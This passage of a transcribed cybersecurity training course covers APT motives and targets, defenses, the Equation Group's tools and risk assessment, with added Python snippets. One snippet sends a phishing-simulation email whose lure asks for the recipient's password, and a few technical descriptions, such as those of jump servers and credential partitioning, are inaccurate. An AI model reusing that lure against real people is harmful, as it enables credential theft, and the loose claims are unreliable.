of an organization. This type of attack is typically conducted by the APTs when
they are hired by another organization or a group of people. Customer data theft.
This type of attack is conducted by APTs when their target is customer data. This
could be an attack to steal customer information and then sell it on the dark web or the underground Internet.
Then comes the competitive advantage. This type of attack is conducted when one
organization wants to steal the information of another organization and gain
competitive advantage.
Let's now look at APT targets. First of all, we have to understand no industry is
spared from APTs. Any industry could be a target. So let's start with chemical. This
is not a typical target, but it is not spared. There have been times when attacks have
happened on chemical organizations.
Then comes the electronics industries. This type of industry is attacked for
intellectual property. For instance, one organization in the electronic industry might
be coming up with some innovative design of a specific product. The competitor
might ask an APT group to conduct an attack and steal that information. Then
comes the manufacturing. Again, intellectual property is the key target in this
industry.
Next comes the aerospace industry. There is a large scope because the
infrastructure is pretty large, and therefore, it is easy to stay low profile and conduct
the attack. IP, or intellectual property, is the key target in this industry. Automotive
industry is again the target. It is a large industry, and the organizations in this
industry are typically large. So therefore they have huge infrastructure and
intellectual property is one of the key targets. What do we have to remember, larger
the industry, therefore, the scope of the target becomes much larger.
When you talk about healthcare, patient data is one of the key data sets the healthcare industry holds. Therefore, patient data becomes the key target. With the
government, political reasons are the main motive. In the energy sector or energy
industry, the key motive is to bring down the infrastructure. In the
telecommunication industry, network and infrastructure are the main target. When
we finally move to the consumer industry, customer data is the key target of the
APTs.
APT Defense Best Practices
[Video description begins] Topic title: APT Defense Best Practices. Your host for
this session is Ashish Chugh. [Video description ends]
Let's now look at APT defense best practices. There are certain best practices that
you would have to follow to ensure that you safeguard yourself from APTs. There
is no set rule about what has to be followed, but what we are trying to show here is
some of the best practices. So for instance, you have to first identify the
weaknesses within your own network. Once you identify these weaknesses, you
have to fix them.
How would you identify these weaknesses? One, you have to do a vulnerability assessment. Secondly, you could also do penetration testing of your infrastructure. You would be able to find weaknesses, and you would also be able to understand what kinds of attacks are possible on your network. Once you have identified these weaknesses and closed them, then you can be pretty sure that there is some level of
security that you have built into your network.
You would also have to monitor the traffic. There is a certain type of traffic that flows in your network. What you have to do is baseline that traffic and understand what the typical type of traffic flowing is. Once that is done, you have to
keep observing the network traffic, over days, weeks, months. This is something
that you have to continuously do. And if there is something that is beyond the usual
network traffic, you can be pretty sure that something is happening on the network
which is not in your favor.
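As a simple illustration of baselining, here is a hypothetical Python sketch that flags an hour whose traffic volume deviates sharply from a recorded baseline; the byte counts and the three-standard-deviation threshold are assumptions for demonstration only.

import statistics

# Hypothetical baseline: bytes transferred per hour during normal operation
baseline_bytes_per_hour = [52_000_000, 48_500_000, 55_200_000, 50_100_000,
                           47_800_000, 53_400_000, 51_600_000]

mean = statistics.mean(baseline_bytes_per_hour)
stdev = statistics.stdev(baseline_bytes_per_hour)

def is_anomalous(observed_bytes, threshold_stdevs=3.0):
    # Flag traffic more than N standard deviations away from the baseline mean
    return abs(observed_bytes - mean) > threshold_stdevs * stdev

print(is_anomalous(250_000_000))  # True - an unusually large transfer, worth investigating
print(is_anomalous(50_500_000))   # False - within the normal range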
You also have to log certain events, and once the logging is done, you have to do log analysis. It is advisable to have a method for collecting these logs in a central place. For instance, all your servers and devices send their logs to a centralized location, so you simply look at the logs in that one place instead of having to go to each server and device to figure out what events are happening.
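For example, with Python's standard logging module an application can forward its events to a central syslog collector; the hostname, port, and logger name below are placeholder assumptions, not values from the course.

import logging
import logging.handlers

# Forward application events to a central syslog collector (hypothetical host and port).
handler = logging.handlers.SysLogHandler(address=("logs.example.internal", 514))
handler.setFormatter(logging.Formatter("%(name)s: %(levelname)s %(message)s"))

logger = logging.getLogger("payroll-app")
logger.setLevel(logging.INFO)
logger.addHandler(handler)

logger.warning("Three failed login attempts for user jdoe")  # lands on the central collector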
You also have to build a strong security posture, which means defense in
depth. [Video description begins] On the slide, this point is written as follows:
Build a strong security posture using information security policy. [Video
description ends]
No single security device, for instance a firewall, can safeguard your network on its own. You will have to have multiple security devices that back each other up and together create a strong security posture. This is what defense in depth means. It could include a firewall, an intrusion detection system, an intrusion prevention system, and various other types of security devices that strengthen your network.
You will also have to put security governance into practice. Security governance is the method by which an organization directs and controls IT security. The fundamental goal of security governance is to ensure that the organization's security strategies are aligned with its business objectives. This simply means that you cannot just implement security and assume you are secure.
You have to monitor your controls, and you also need an accountability framework to ensure that whoever has been assigned a certain level of responsibility is actually carrying it out. Security governance also brings risk management into the picture, which means you will have to identify risks and mitigate them before a hacker comes along and exploits them. You should also build correlation and threat management systems into the network, which means you have to identify threats, mitigate them, and ensure that you are protected.
Methods to Strengthen APT Defenses
[Video description begins] Topic title: Methods to Strengthen APT Defenses. Your
host for this session is Ashish Chugh. [Video description ends]
We will now look at the methods to strengthen the APT defenses. First and the
foremost, you have to assume that you are already compromised. With this thought
process, you need to build your defenses assuming that you have been
compromised and you do not want to be compromised again.
You have to dig deeper into errors and accidents, which means you have to put a system like a SIEM in place to log incidents. A SIEM is a centralized logging mechanism into which multiple devices and servers can log their events. You will have to review these logs on a regular basis and figure out what errors have been logged. You will also have to monitor known elements and everything related to them. This means monitoring your network very closely and looking out for anything that is out of place from the normal routine.
You will have to broaden the scope, which means you include everything, even the endpoints. Nowadays, hackers do not typically go after the firewall or the servers; their main targets are the endpoints. You have to be very cautious, because endpoints can be the entry point to the network, so you have to ensure that you include them in the audit trail. Use next-gen security solutions. This means you have to get rid of older security devices that are obsolete and put the latest hardware and software in place to upgrade your security. One thing to remember: older security devices will not be able to prevent the latest threats that may hit your network. Therefore, you have to ensure your security infrastructure is always up to date, which means upgrading both the security hardware and the related software.
You'll also have to automate the investigation and validation processes, which means you minimize manual effort and automate as much as possible. Remember, manual effort causes more errors, and if you automate these processes, investigation and validation, you get faster and better results.
Moving on, you will need full visibility of the network traffic. As I discussed earlier, you'll have to baseline your network traffic, and anything unusual after that which does not match the baseline can be treated as suspicious or malicious traffic. That can only be done if you have full visibility of the network traffic. If you do not know what is happening on your network, you cannot stop malicious traffic or even detect it.
Reduce the attack surface. If there is a large attack surface, more attacks are likely to happen. Therefore, you should reduce the attack surface as much as possible; this minimizes the possibility of an attack on your network. Enable deep logging. As we have just discussed, you have to put a system like a SIEM in place to do centralized logging and ensure all errors and incidents are being logged into it. This gives you a centralized mechanism you can use to review logs from servers and various devices.
You have to categorize your assets. You need to know which asset is critical and
which asset is not. Your emphasis should be protecting the critical assets first. That
can only happen if you have done the categorization. Later we will look at what
assets are and how they should be protected.
You have to have defense in depth and breadth. This means your defense in depth should cover the entire network, all the entry points. There should be multiple layers of defense in place; for instance, a firewall, an intrusion prevention system, a SIEM, and an intrusion detection system. With multiple layers of defense, if a hacker gets past one level, the next level should be able to catch them.
Dealing with Advanced Persistent Threats
[Video description begins] Topic title: Dealing with Advanced Persistent Threats.
Your host for this session is Ashish Chugh. [Video description ends]
After you've learned about the methods to strengthen the APT defenses, we will
now look at dealing with advanced persistent threats. As we discussed earlier,
APTs are low profile, they are undetectable in most cases, and they are very, very
persistent. So this means that it is not going to be possible for a single security
solution to detect and deal with them.
Take the example of an endpoint, such as a desktop. If you have an antivirus or antimalware solution, it is not necessarily going to be able to detect an APT. The reason is that APTs typically use custom malware, which is unknown to the antivirus or antimalware vendors. The desktop is therefore infected, but as far as the antivirus or antimalware solution is concerned, there is nothing malicious on the system.
Hence, it is not possible for you to rely on only a single security solution. You have to have different methods and mechanisms in place to ensure that you are able to catch APTs. The majority of APT exploits can easily evade firewalls or typical antivirus solutions.
Remember, these are custom exploits. They are not something that has been used widely; each APT group designs a specific exploit to meet a specific purpose. Since the antivirus or antimalware companies do not even know about the exploit, they cannot write a signature to catch it. Because APT exploits are undetectable, they remain in the system, so it is quite possible that they have been in the network or on the system for many months.
There will also be scenarios where you will not even know what the APT has done before it quietly moved out. From your point of view, the system has been clean for many months, the antivirus has been updated, and a firewall has been activated on the desktop. As far as you're concerned, you're pretty secure. However, the APTs can easily evade the firewall or the antivirus solution.
As far as the last point is concerned, APTs will choose the weakest link in the security chain, which is a human. [Video description begins] The following information is displayed on screen: APT will choose the weakest link in the security chain, which is generally a human. [Video description ends] And how are humans exploited? Through social engineering. Therefore, social engineering becomes the basis of most of these attacks.
Let's take an example. An APT would perform a social engineering attack by sending a phishing mail that is quite threatening to the employee. The employee gets scared and sends out the required information as a response to the phishing mail. That is the entry point. That is where the APT will use that information to make an entry into the network or the user's system.
You must also work with the mindset that you have already been breached. If you keep this mindset, you are most likely to tighten up the security on the network. Think: if a breach has already occurred, what was the component on the network that was breached? You have to work with this mindset and then ensure there is enough security implemented on the network.
However, you have to keep in mind that too many security controls, some of them unnecessary, may complicate the infrastructure or the network architecture. Therefore, implement what is necessary while ensuring that you are secured from all corners.
The organization must work with a protect-first mindset. This is part of a security-first mindset in which you ensure that security is implemented, that it is implemented properly, and that it is implemented at every corner of the network. There should not be any loose corner through which the hacker can get in.
You must also include methods that can give you real-time analytics on the data. This is because you want to detect the invasive behavior. [Video description begins] The following information is displayed on screen: You must include real-time advanced security data analytics to detect invasive behavior. [Video description ends]
So for instance, you can implement intrusion prevention system or intrusion
detection system. The intrusion detection system will only detect the attack but will
not do anything beyond that. Intrusion prevention system, on the other hand, will
not only detect but also prevent the attack.
Beyond that, you will need methods to analyze the data you collate. Everything in a network must be monitored, and this must include the desktops and other endpoints. In many scenarios where an organization has been breached, it has been found that an endpoint was the entry point for the hackers or the APTs. Therefore, you have to ensure that every single device on the network is being monitored, and monitored proactively.
You must also protect the network perimeter, which means the entry point; the
main entry point to the network must also be protected. And if you do not do that,
then you're leaving the gates open for the APTs to simply walk in and get into the
network.
We will now look at basic, intermediate, and advanced methods of dealing with advanced persistent threats, or APTs. The basic methods of dealing with APTs are patching and configuration management. Patching simply means you patch every system and every device on the network with the latest updates, and as updates are released, you apply them using an automated method.
Your network could include thousands of systems, so it is not possible for you to manually update each and every one. You could implement a method for this; in a Windows environment, for example, you could use Windows Server Update Services (WSUS) to update these systems. Configuration management means that you capture the configuration of each and every system and then baseline those systems accordingly.
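As a simple, hypothetical illustration of configuration baselining (the settings and values below are made up for the example), you can diff a host's captured configuration against its approved baseline:

# Hypothetical approved baseline and the configuration captured from a host.
baseline = {"firewall": "on", "rdp": "disabled", "av_version": "4.2"}
captured = {"firewall": "on", "rdp": "enabled", "av_version": "4.1"}

# Report every setting that has drifted from the baseline.
drift = {key: (baseline[key], captured.get(key))
         for key in baseline if captured.get(key) != baseline[key]}

for setting, (expected, actual) in drift.items():
    print(f"{setting}: expected {expected!r}, found {actual!r}")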
Then comes the SIEM, the Security Information and Event Management system. This is a method by which you can centrally collate all the logs from your various devices and servers. You should also have an advanced malware detection system. Most organizations have a server that pulls down updates from the antimalware vendor and then distributes those updates to the various systems on the network. This server also has the capability of detecting which systems are not running the latest updates.
You should also baseline the network traffic by performing packet
capturing. [Video description begins] The following information is displayed on
screen: Full network packet capturing. [Video description ends] This could be
done with a tool called Wireshark.
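Wireshark is a graphical tool; if you wanted to script a similar capture for baselining, one option, shown here purely as a sketch, is the third-party Python library scapy, assuming it is installed and the script runs with capture privileges.

from scapy.all import sniff, wrpcap  # requires scapy and packet-capture privileges

# Capture 500 packets from the default interface as a sample of normal traffic.
packets = sniff(count=500)

# Print a one-line summary per packet and save the capture for later comparison.
packets.summary()
wrpcap("baseline-sample.pcap", packets)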
You should also have incident response and forensic investigation methods in place. For instance, if an incident happens, how should a user respond to it? How should the user report it, and to whom? You'll have to put these kinds of processes in place. Forensic investigation addresses the other side: if an incident has already taken place, how do you figure out what happened?
Let's now look at the intermediate methods of dealing with APTs. The first is outbound gateway consolidation. You need to know how many gateways you have. There could be multiple entry points and gateways in a network, depending on how your network architecture is laid out, and you have to ensure that they are consolidated.
You have to have continuous monitoring on the network. You cannot simply do packet capturing once and then again a month later. You'll have to have continuous monitoring, not only of the network traffic but of each and every system on the network.
You should have e-mail scanning. [Video description begins] The following information is displayed on screen: Proprietary e-mail scanning. [Video description ends] Any e-mail coming into or going out of the network should be scanned. The reason e-mail scanning falls into the intermediate category: just assume an APT is quietly sneaking information out using e-mail. APTs generally would not follow this method, but you never know; if they find that e-mail scanning is not happening on the network, they might use it.
You have to have proactive APT assessments. If your organization does not have
the capability of doing APT assessment, you should hire a third-party vendor to
conduct these assessments and see how vulnerable you are to an APT.
You should also perform regular phishing simulations with your users: send out phishing e-mails from unknown e-mail addresses and see whether the users respond. But to ensure users do not fall for phishing e-mails, you'll first have to train them so they are aware of what a phishing e-mail is and what it looks like, even though there are many different variants.
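A bare-bones sketch of sending such a simulation message with Python's standard smtplib follows; the relay host, addresses, and lure wording are all placeholder assumptions, and a real program would also record who clicked or replied.

import smtplib
from email.message import EmailMessage

msg = EmailMessage()
msg["Subject"] = "Action required: password expiry"   # placeholder lure text
msg["From"] = "it-helpdesk@external-lookalike.test"   # hypothetical lookalike sender
msg["To"] = "employee@example.internal"
msg.set_content("Your password expires today. Reply with your current password to keep access.")

# Send through an internal relay dedicated to the simulation (hypothetical host).
with smtplib.SMTP("phish-sim-relay.example.internal", 25) as server:
    server.send_message(msg)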
You could also do PC virtualization, which means you have less hardware on the floor and more virtual machines running on a server. This can also prevent a lot of incidents, because virtualization gives you a simulation of the actual hardware. You could also do application whitelisting: allow only the applications that have been approved to run on the network, on a desktop, or on a server. Everything else should be blocked. This is required because when users have open Internet access, many of them download installation files from the Internet.
When they do that, because there is nobody watching over them, they simply install these applications. If such an application is malware or contains malware, there is a possibility that not only the desktop but the entire network gets infected. Therefore, you should allow only specific applications to run on the desktops and the servers.
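A minimal sketch of the whitelisting idea follows; the hash values and file path are hypothetical, and real deployments would normally use an OS-level application control policy rather than a script.

import hashlib

# Hypothetical SHA-256 hashes of the only executables approved to run (placeholders).
APPROVED_HASHES = {
    "5c4f...d2a1",  # corporate-mail-client.exe (placeholder hash)
    "9b1e...77c3",  # approved-browser.exe (placeholder hash)
}

def is_approved(path):
    # Hash the file in chunks and check the digest against the approved list.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest() in APPROVED_HASHES

print(is_approved("downloads/setup.exe"))  # False unless its hash has been approved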
You should segregate sensitive data. It should not be stored on the same segment or network where everybody else sits. It should be segregated: limit access, put access control in place, and if the data is too sensitive, ensure that there is no access to it at all unless it has been approved by top management. You should also not allow open access to the Internet.
There should be a proxy in place. A proxy will filter out a lot of the requests users send to reach particular sites. For example, a user might want to play an online game. If you do not have a proxy in between, that user is free to play that game, which will consume a lot of bandwidth, and several games require a component to be downloaded onto the user's system, which could itself be malware. With proxy filtering, if you simply block the games category, the user will not be able to reach that particular website and play the game.
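The filtering logic itself is conceptually simple. As a toy sketch (the category list and domains are made-up examples, not a real proxy configuration):

from urllib.parse import urlparse

# Hypothetical category data: which categories are blocked and how domains map to them.
BLOCKED_CATEGORIES = {"games", "file-sharing"}
DOMAIN_CATEGORIES = {
    "play.somegamesite.test": "games",
    "intranet.example.internal": "business",
}

def allow_request(url):
    # Deny the request if the destination domain falls into a blocked category.
    host = urlparse(url).hostname or ""
    return DOMAIN_CATEGORIES.get(host, "uncategorized") not in BLOCKED_CATEGORIES

print(allow_request("http://play.somegamesite.test/lobby"))      # False: games category
print(allow_request("http://intranet.example.internal/portal"))  # True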
You should also have two-factor authentication in place, which means combining two different types of factors, for example something you know with something you are. Something you know is a password or a PIN; something you are is a biometric, such as a fingerprint or a retina scan.
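A time-based one-time password (TOTP) is another common second factor. A minimal sketch using the third-party pyotp library, assuming it is installed, looks like this:

import pyotp

# Generate a shared secret once and enroll it in the user's authenticator app.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

print("Provisioning URI for the authenticator app:",
      totp.provisioning_uri(name="jdoe@example.internal", issuer_name="ExampleCorp"))

# At login time, verify the 6-digit code the user supplies alongside their password.
user_code = totp.now()           # in reality this comes from the user's device
print("Code accepted:", totp.verify(user_code))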
Now, when you move to the advanced category, one of the best defenses against APTs is no Internet access. If your organization does not provide Internet access to its users, then, simply put, nobody can go to the Internet, nobody can download malware, and malware cannot get into your network that way. Unless somebody brings in an infected USB drive and plugs it into a system, which is a different story, nothing can get in from the Internet.
You should also have credential partitioning. This means the credentials are stored on a separate partition and are encrypted. You should also have jump servers, which mediate requests on their way to sensitive systems. For instance, you send a request to the web server; the web server will only cater to requests related to its website, typically on port 80 or port 443. Any other request aimed at the web server is passed through the jump server, which handles it and determines whether it is malicious or not.
You should also air-gap networks holding sensitive data. Air-gapped networks have virtually no presence on the main network; they are completely isolated, with minimal or absolutely no access to them. You should also have counterintelligence operations. Most large organizations have a counterintelligence team that is well trained and geared up to handle any kind of APT threat. That concludes this particular section.
The Equation Group
[Video description begins] Topic title: The Equation Group. Your host for this
session is Ashish Chugh. [Video description ends]
Earlier in this course, we talked about four different APT groups. One of them was the Equation Group. The Equation Group is considered to be one of the most sophisticated and advanced APT groups. They are known for using strong encryption algorithms and various strategies that make them hard to detect.
The Equation Group first came into existence in 2001, which is when they first made their appearance. This APT group targets one specific victim at a time; they do not generally go after many victims at once. They will choose one particular target, study it well, and then go after it to ensure that their motives are met.
The Equation Group also has various malware platforms, such as EquationDrug, GrayFish, TripleFantasy, Equester, Double Fantasy, and Fanny. These platforms are basically designed to steal information from the target.
They also use command & control centers to monitor their deployed malware. [Video description begins] According to the slide, the Equation Group uses command & control centers to monitor deployed malware. [Video description ends] The only way you can monitor malware is through a command & control center. Once the Equation Group deploys malware onto a target, they have to monitor it and, accordingly, send out commands telling the malware what to do and how to behave. That is why they use command & control centers.
The Equation Group has different types of malware. One of their malware modules is designed to alter hard drive firmware, which can make the hard drive completely unusable. They also have a worm named Fanny, which can attack air-gapped networks: even if you have an isolated network, the Fanny worm is designed to attack it. This particular worm was created in 2008 and was used to gather information about targets in the Middle East and Asia.
In most cases, victims' infections were later upgraded to the Double Fantasy or EquationDrug system. [Video description begins] The following information is displayed on screen: Replaces the good components, such as CD-ROM, with infected versions. [Video description ends]
Even though the Equation Group has designed its own malware and exploit kits, it has shared them with the Stuxnet and Flame groups. [Video description begins] According to the slide, the Equation Group has shared its exploits with Stuxnet and Flame groups. [Video description ends] Stuxnet is a famous incident from a few years ago, in which an Iranian nuclear enrichment facility was attacked and damaged.
Let's now look at some of the key tools used by the Equation Group. The first one is the DoublePulsar backdoor, an implant that is delivered through exploits targeting Windows Server Message Block, or SMB, version 1. FuzzBunch is the exploitation framework used to deploy such exploits. EternalBlue, EternalSynergy, and EternalRomance are exploits designed to target SMB version 1.
Then you have EquationDrug, a very complex attack platform developed by the Equation Group. It supports a plug-in module system whose modules can be dynamically loaded and unloaded by the Equation Group. Then you have another tool named GrayFish, known to be the most sophisticated attack platform from the Equation Group. It resides in the registry and relies on a bootkit to gain execution at operating system start-up.
Then there are more tools such as TripleFantasy, Fanny, Double Fantasy, Equester, and EquationLaser, an older implant that was created and used between 2001 and 2004 and mainly worked with Windows 95 and 98.
Let's now look at the victims of the Equation Group around the world. If you notice, Asia has the highest infection rate. After that, there is a medium-level infection rate in parts of Africa, and then a low infection rate in the other parts of the world. However, Asia and some parts of the United States are considered to be heavily infected with Equation Group malware.
Key Tools Used in APT
[Video description begins] Topic title: Key Tools Used in APT. Your host for this
session is Ashish Chugh. [Video description ends]
We'll now look at the key tools used in APTs. The first one is social engineering. It is the first thing attackers do before launching an attack; it opens up the gates for the attack. The APT group could use various social engineering methods to initiate the attack; for instance, a phishing mail could be sent out, or spamming could be used.
Then we come to exploit kits, which are mainly used for designing malware and conducting various types of attacks. Downloader kits are mainly designed to push downloads onto the target systems. Then we come to drive-by downloads, in which a web server includes malicious code that is downloaded to the target system. Then we have rootkits, malware that gives the hacker control over the processes of the target systems.
Then we have the backdoor, which provides easy access to the system and allows the hacker to bypass security controls. Then there is the central controller, which acts as a command and control center and helps the hackers or the APT groups control the malware on the target system.
DNS modification is used to redirect users to malicious websites: when the user enters a particular URL, the user is actually redirected to a phishing site or another malicious website. APTs also perform routing modifications to route traffic to a malicious location rather than the legitimate one. APTs also use rogue Wi-Fi devices, which attract users to connect so the hackers or the APTs can capture the traffic from their devices.
Dealing with Risks
[Video description begins] Topic title: Dealing with Risks. Your host for this
session is Ashish Chugh. [Video description ends]
A risk can be defined in a generic way or in the context of information security. Essentially, risk is the potential of losing something that has value; that potential may be high or low depending on the situation. [Video description begins] According to the slide, risk is the potential or probability of a loss that may occur. [Video description ends]
For example, a system exposed to the Internet carries a higher risk of threats than a system that is not exposed to the Internet. Risk does not exist in the present; it always concerns the future, and therefore it impacts future events. [Video description begins] According to the slide, risk is focused on the potential of future events, not the present events. [Video description ends]
In a generic sense, a risk is a potential problem that may or may not happen. Another way to define risk is as the potential of an action or activity to result in an undesirable outcome or a loss. For example, there is a risk of financial loss due to an attack conducted by a hacker.
We also have to understand that risk cannot always be eliminated. Depending on the current state of the organization, the current state of the infrastructure, and the type of security you have implemented, one or more risks will always be present.
For instance, take the example of a firewall. What could be the risk associated with having a single firewall to filter incoming and outgoing traffic? The risk is that the firewall can fail. That may or may not happen, but it is a risk. So how do you address that risk? You put a redundant firewall in place. That is how you can mitigate that particular risk.
Let's now look at some risk examples. Risks are unavoidable, and they apply to everything, from day-to-day life onward. For example, if you are driving a car at a very high speed, there is a chance that an accident will take place. That is the risk in this situation. Another example, in the context of information security: if your antivirus application is not updated, there is a risk that malware will get into the system.
Let's look at some more risk examples. The first is non-compliance with a policy, which we can assume is a security policy; the risk is that users may not follow it. Then you have loss of information or data; a server's hard drive failing is a risk that can cause that loss. There is also the risk of a Denial of Service, or DoS, attack: if your infrastructure, meaning the servers, the endpoints, and the firewall, is not protected or configured properly, there is a chance that a DoS attack will occur.
Then we come to an information breach, which is a risk if proper access control permissions are not defined. Flood is also a risk: if your office is situated in a city near a river, the sea, or the ocean, there is a chance that a flood may happen.
Let's now look at risk-based frameworks. A risk-based framework is also known as a risk-based approach. Risk management is an ongoing process that aims to minimize risk and losses to the organization. There are several phases in the risk management process that make up the risk-based approach. When you follow the risk management process accurately and strategically, you enable the organization to improve its decision-making capabilities regarding risk.
Within the risk-based framework, which is part of the risk management process, we have to decide what is important to protect. Here you define the boundaries within which risk-based decisions are made. You have to identify the assets, categorize them, evaluate them, and prioritize them, so that you have narrowed down which assets are most critical to protect and which are not. You then have to identify the threats and vulnerabilities that impact those assets.
Then you have to determine how to protect the assets. In this step, you use the risk management process to examine the impact of threats and vulnerabilities on the assets in the context of the system environment, and you determine the risks those assets face.
This set of activities is part of the risk assessment process, which is a critical step in developing an effective risk management strategy. In this process we need to know, above all, how to protect our assets from the threats.
Later, you move to risk control, which is the application of controls to reduce the risks to an organization's data and information systems. The goal here is to identify which approach is most appropriate to protect the assets and the information. You have to prioritize, evaluate, and implement the approaches and risk control measures identified in the risk assessment process.
Then, finally, you move to risk monitoring, which is where you monitor and improve the controls. There are multiple reasons you would want to do this. When you are monitoring risks, you have to keep track of identified risks, monitor them, and identify new risks. You also have to determine how effective the executed risk response plan has been in reducing risk.
Finally, you have to ensure that your risk management policies and methods comply with the organization's mission and objectives, which means you cannot define a risk management strategy that does not align with them. You have to ensure that everything is aligned: your risk management processes and methods must be in sync with the organization's business objectives and vision.
So how do you improve the controls after that? This is an iterative step in which you continue to test the controls you have implemented; here I am referring specifically to the security controls. You also continue to evaluate your assets and check whether vulnerabilities still exist in the system. If they do, you apply better controls.
Let's now understand the types of risk responses. There are different types of risk
responses that you can have against a particular risk. Therefore, it is up to you,
depending on the situation, how do you want to handle a particular risk or rather
how do you want to respond to a particular risk. It could be risk reduction, risk
avoidance, risk transfer, or risk acceptance.
Let's first look at risk reduction. This is the most common method of managing risk: you put control measures in place to reduce the impact of the risk. The second method is risk avoidance, which is ideally the best option in some situations. In this method, you eliminate the activities or unwanted situations that expose assets to risk in the first place. Taken to its extreme, it would mean the complete elimination of all vulnerabilities in the system, which is not realistic.
So risk avoidance is good in some situations, but it may not work out in all of them. Then we have risk acceptance. There are times when the cost of a countermeasure is too high and the loss due to a particular risk is relatively small. In that case, the organization might simply accept the risk and take no action against it, because the potential loss is very low compared to the cost of the countermeasure you would have to put in place.
Accepting a risk is generally not recommended, but in certain situations you may have to. If you do, you must properly document the risk and review it regularly to ensure the potential loss stays within the limits your organization can accept.
Typically, you would go with risk acceptance when you know the countermeasure is very difficult to implement, costs too much, or is very time consuming. After all, the longer it takes, the more cost you incur. You always look at the cost of implementing a countermeasure: if it is too high and the risk is very low in comparison, you might as well accept the risk.
Finally, we have risk transfer. This is a method where the responsibility for addressing potential damage due to a risk is transferred to a third party. This could be a third-party vendor or a third-party service provider to whom you simply pass on the responsibility of addressing the risk.
Let's now look at some examples, starting with risk reduction. Consider installing a badge system. Why would you want a badge system at the entrance of your building? Because you want to reduce the risk of unauthorized entry. Without a badge, you cannot simply walk into the building or your office; with a badge system, you have to swipe your badge to make an authorized entry.
Another example is installing a firewall. You reduce the risk of the network being attacked by installing a firewall. If you do not install one, the risk, and the probability of an attack on the network, is much higher.
Let's now look at examples of risk avoidance. Assume you have been handed a complex project. How do you handle it? One option is simply to go ahead and do it, but that is not risk avoidance. Risk avoidance in this scenario would be to change the scope of the project, reduce the complexity, and then continue with it. [Video description begins] The following information is displayed on screen: Change the scope of a project – avoid the risk of getting into a complex project. [Video description ends]
Another example could be buying a commercial product. In this situation, you avoid the risk of using an open-source product. How are you avoiding risk here? Open-source products in many cases do not have regular updates or upgrades, and there is often no single entity that owns the product. In such a scenario, you may not know where to get updates, and if you find a bug, you don't know who is going to fix it.
So instead, you avoid this risk and go for a commercial product of a similar nature. Now there is an organization that owns the product; you have paid a fee to buy the product or use its services. Therefore, you have avoided the risk of not getting updates or regular upgrades.
Let's now talk about risk acceptance. One example could be an approved deviation from a security policy. There is a security policy in the organization, and everybody has to adhere to it. If a deviation is happening and you take approval for it, you are accepting the risk that may arise from that deviation. If management has approved the deviation, that means they are also accepting the risk.
Now let's assume you have an in-house-built application. You find a small bug, but you accept the risk because it would take a lot of your team's time to fix the bug and release an update, and you do not consider the time and money worth it for that particular bug. [Video description begins] The following information is displayed on screen: Will cost a lot to fix a small vulnerability. [Video description ends]
More specifically, if you know this particular application is hosted only on the intranet and is not visible from the Internet, then you know you can quite safely accept that risk. The attack cannot reach that application directly from the Internet, so you are ready to accept the bug and move ahead with the risk.
Let's now look at risk transfer examples. One of the biggest examples is purchasing insurance. You purchase insurance for your infrastructure; if an earthquake or some other disaster destroys it, you know there is insurance in place. Even though you will not be able to get the data back, at least the hardware infrastructure can be repurchased. Here you have transferred the risk to that infrastructure to a third party, the insurance company.
Let's also assume another scenario, where a project contains a complex task. You do not think your team has the capability to handle it, or they may take too long to complete it. In this case, you can simply transfer the risk of completing this complex task to a third party.
Risk Assessment to Protect Assets
[Video description begins] Topic title: Risk Assessment to Protect Assets. Your host
for this session is Ashish Chugh. [Video description ends]
Let's now look at risk management framework, which provides the base for risk
management. There are essentially five components of the risk management
framework. These are identify, measure, manage, monitor, report. First you have to
identify the risks, then you have to measure the intensity of the risk, then you have
to manage this risk. This could be done by using one of the four methods. It could
be risk reduction, risk avoidance, risk acceptance, or risk transfer.
Once you have done that, then you have to monitor the risk. And finally, you have
to report the risk. The purpose of risk assessment is to examine the impact of
threats and vulnerabilities of the assets in the context of the system environment
and to determine the estimate of the risk faced by the assets. This step is critical for
the development of effective risk management strategy. [Video description
begins] According to the slide, risk assessment is a method to find risks that can
impact an organization's ability to function or conduct business. [Video description
ends]
We need to know how to protect our assets from the threats. [Video description
begins] According to the slide, risk assessment is a method to identify the critical
assets along with their weakness and threats to them. [Video description ends]
Therefore, we have to identify the preventive measures.
Now, one of the questions is: why should risk assessment be performed? You have to understand that it is required to integrate the organization's risk management objectives with its business goals. You have to identify high-risk and valuable information assets; you need to identify the assets that need protection. You also need to determine the security initiatives needed to protect those high-risk, valuable assets from threats. [Video description begins] The following information is displayed on screen: Identify the level of protection for identified assets. [Video description ends] You also need to determine the current level of security and its effectiveness; if the security is not adequate, you will have to put more security controls in place to protect the assets.
You also have to ensure compliance with the information security laws, guidelines,
and regulations. [Video description begins] The following information is displayed
on screen: Identify the legal and compliance concerns. [Video description ends]
When you talk about risk assessment, there are two types: qualitative risk assessment and quantitative risk assessment. Going forward, we will look at each type in detail. Qualitative risk assessment focuses on evaluating the value of each asset and the impact of threats that could affect these assets under different scenarios.
It is purely based on judgments and likelihoods identified in interviews with members across the organization's units. These members are interviewed because they have either experienced these threats or have some knowledge about them. Qualitative risk assessment does not assign any monetary value to the components of the assessment, that is, the threats and assets.
It explores different risk scenarios and ranks the seriousness of threats using grades or classes, such as low, medium, and high. [Video description begins] According to the slide, qualitative risk assessment uses a pre-defined rating scale. [Video description ends]
You would perform the qualitative risk assessment when it is difficult for you to
quantify the assets and threats; for example, when there is a risk to an
organization's brand and reputation. [Video description begins] According to the
slide, qualitative risk assessment does not analyze the risks mathematically but uses
inputs from stakeholders. [Video description ends]
On the other hand, quantitative risk assessment puts numbers to risk, which means it deals with numeric values and the money involved. It attempts to assign a cost to elements, and it requires quantification of all the elements of the assessment, including asset value, threat occurrence frequency, and controls. It also calculates the probability and impact values of these threats.
Then you have to determine the annual risk of suffering a loss, which means how often a particular threat is expected to occur and how much loss you would bear each time. Quantitative risk assessment works with the ARO, or annualized rate of occurrence; the SLE, or single loss expectancy; and the ALE, or annualized loss expectancy. You use a few simple formulas to arrive at these values: the SLE is the asset value multiplied by the exposure factor, and the ALE is the SLE multiplied by the ARO. The ALE is the main output of the quantitative risk assessment.
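As a small worked sketch (the asset value, exposure factor, and occurrence rate below are made-up numbers used only to show the arithmetic):

def single_loss_expectancy(asset_value, exposure_factor):
    # SLE = asset value x exposure factor (fraction of the asset lost per incident)
    return asset_value * exposure_factor

def annualized_loss_expectancy(sle, aro):
    # ALE = SLE x annualized rate of occurrence (expected incidents per year)
    return sle * aro

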